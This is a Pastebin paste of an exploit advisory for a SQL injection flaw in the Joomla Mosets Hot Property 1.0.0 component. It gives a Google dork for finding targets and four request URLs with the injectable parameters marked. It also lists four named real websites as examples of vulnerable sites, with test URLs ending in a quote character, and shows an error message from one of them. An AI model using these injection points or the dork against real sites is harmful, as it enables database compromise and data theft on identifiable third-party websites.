KingSkrupellos

Joomla Mosets Hot Property 1.0.0 SQL Injection

Feb 11th, 2019
64
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.74 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla Mosets Hot Property 1.0.0 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 12/02/2019
  7. # Vendor Homepage : mosets.com/hotproperty/
  8. # Software Download Link : vip-file.net/download/847ea7616390/MosetsHotProperty0.98Full.rar.html
  9. # Software Information Link : joomfans.com/joomla-components/mosets-hot-property-v100.html
  10. # Software Version : 1.0.0
  11. Compatible with Joomla! 1.0.x - 1.5.x
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:''/index.php?option=com_hotproperty''
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. Hot Property allows you to manage properties in your website in an easy and effective
  27.  
  28. way while using Joomla!. This powerful combination enable you to run a real estate
  29.  
  30. website and use the most user friendly open source Web Content Management
  31.  
  32. System (CMS) available today.
  33.  
  34. ####################################################################
  35.  
  36. # Impact :
  37. ***********
  38. Joomla Mosets Hot Property 1.0.0 and other versions -
  39.  
  40. component for Joomla is prone to an SQL-injection vulnerability because it
  41.  
  42. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  43.  
  44. Exploiting this issue could allow an attacker to compromise the application,
  45.  
  46. access or modify data, or exploit latent vulnerabilities in the underlying database.
  47.  
  48. A remote attacker can send a specially crafted request to the vulnerable application
  49.  
  50. and execute arbitrary SQL commands in application`s database.
  51.  
  52. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  53.  
  54. An attacker can exploit this issue using a browser.
  55.  
  56. ####################################################################
  57.  
  58. # SQL Injection Exploit :
  59. **********************
  60. /index.php?option=com_hotproperty&task=view&id=[ID-NUMBER]&Itemid=[SQL Injection]
  61.  
  62. /index.php?option=com_hotproperty&task=viewtype&id=[ID-NUMBER]&Itemid=[SQL Injection]
  63.  
  64. /index.php?option=com_hotproperty&view=type&id=[ID-NUMBER]&sort=price&order=asc&limit=[ID-NUMBER]&limitstart=[SQL Injection]
  65.  
  66. /index.php?option=com_hotproperty&task=viewtype&id=[ID-NUMBER]&sort=name&order=asc&Itemid=[ID-NUMBER]&limit=[ID-NUMBER]&limitstart=[SQL Injection]
  67.  
  68. ####################################################################
  69.  
  70. # Example Vulnerable Sites :
  71. *************************
  72. [+] s188921642.websitehome.co.uk/horizon/index.php?option=com_hotproperty&task=view&id=39&Itemid=27%27
  73.  
  74. [+] mail.costablancabargainproperties.com/index.php?option=com_hotproperty&view=type&id=0&sort=price&order=asc&limit=15&limitstart=90%27
  75.  
  76. [+] jurcevic.hr/index.php?option=com_hotproperty&task=viewtype&id=2&sort=name&order=asc&Itemid=29&limit=5&limitstart=5%27
  77.  
  78. [+] simplequiltmaking.com/index.php?option=com_hotproperty&task=viewtype&id=1&Itemid=32%27
  79.  
  80. ####################################################################
  81.  
  82. # Example SQL Database Error :
  83. ****************************
  84. Deprecated: Function eregi() is deprecated in /home/simplequ/public_html/includes/sef.php on line 533
  85.  
  86. ####################################################################
  87.  
  88. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  89.  
  90. ####################################################################
Add Comment
Please, Sign In to add comment